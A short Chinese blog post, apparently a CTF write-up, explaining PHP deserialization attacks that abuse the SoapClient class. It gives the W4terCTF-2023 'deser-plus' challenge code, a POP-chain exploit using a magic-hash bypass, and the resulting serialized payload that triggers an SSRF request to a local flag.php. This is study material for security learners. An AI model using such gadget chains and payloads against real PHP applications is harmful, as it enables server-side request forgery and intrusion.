php反序列化进阶3--SoapClinent安全

博主： unique-Elven
发布时间：2024 年 01 月 05 日
150 次浏览
1 条评论
265字数
分类： Web安全渗透测试

什么是soap

[SoapClient原生类在开发以及安全中利用-CSDN博客](https://blog.csdn.net/qq_38154820/article/details/119952852)

启动soap模块

[php中soapClient如何配置 - 顾遥 - 博客园 (cnblogs.com)](https://www.cnblogs.com/ljy9631/articles/9149400.html)

例题W4terCTF-2023：deser-plus:

```
<?php
    class A
    {
        public $a;
        public $b;

public function __wakeup()
        {
            $this->a = "hacker?";
        }

public function __invoke()
        {
            if (isset($this->a) && $this->a == md5($this->a)) {
                $this->b->uwant();
            }
        }
    }
    class B
    {
        public $a;
        public $b;
        public $k;

function __destruct()
        {
            $this->b = $this->k;
            die($this->a);
        }
    }
    class C
    {
        public $a;
        public $c;

public function __toString()
        {
            $cc = $this->c;
            return $cc();
        }
        public function uwant()
        {
            if ($this->a == "phpinfo") {
                phpinfo();
            } else {
                $this->a->unexist_function();
            }
        }
    }
    $a = new A();
    $b = new B();
    $c1 = new C();
    $c2 = new C();

$b->b=&$a->a;
    $b->k = "0e215962017";
    $b->a = $c1;//通过___destruct调用C的__toString
    $c1->c = $a;//通过__toString调用__invoke
    $b->a = $c1;//通过__invoke调用uwant();
    $c2->a = new SoapClient(null,array('location'=>'http://127.0.0.1/flag.php','uri'=>'http://127.0.0.1/flag.php'));
  
    $a->b = $c2;
    echo serialize($b);
//O:1:"B":3:{s:1:"a";O:1:"C":2:{s:1:"a";N;s:1:"c";O:1:"A":2:{s:1:"a";N;s:1:"b";O:1:"C":2:{s:1:"a";O:10:"SoapClient":4:{s:3:"uri";s:25:"http://127.0.0.1/flag.php";s:8:"location";s:25:"http://127.0.0.1/flag.php";s:15:"_stream_context";i:0;s:13:"_soap_version";i:1;}s:1:"c";N;}}}s:1:"b";R:5;s:1:"k";s:11:"0e215962017";} 
?>
```

最后修改：2024 年 01 月 05 日